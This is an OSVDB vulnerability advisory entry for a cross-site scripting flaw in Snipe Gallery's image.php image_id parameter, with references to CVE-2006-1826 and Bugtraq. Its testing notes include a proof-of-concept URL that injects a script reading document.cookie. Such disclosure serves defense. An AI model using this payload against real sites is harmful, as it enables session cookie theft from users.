Snipe Gallery image.php image_id Variable XSS

2006-04-16T03:00:14
ID OSVDB:24954
Type osvdb
Reporter OSVDB
Modified 2006-04-16T03:00:14

Description

Manual Testing Notes

http://[target]/[path]/image.php?page=1&gallery_id=980&image_id='><script>alert(document.cookie)</script>

References:

Security Tracker: 1015947 Related OSVDB ID: 24953 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0324.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0332.html CVE-2006-1826 Bugtraq ID: 17543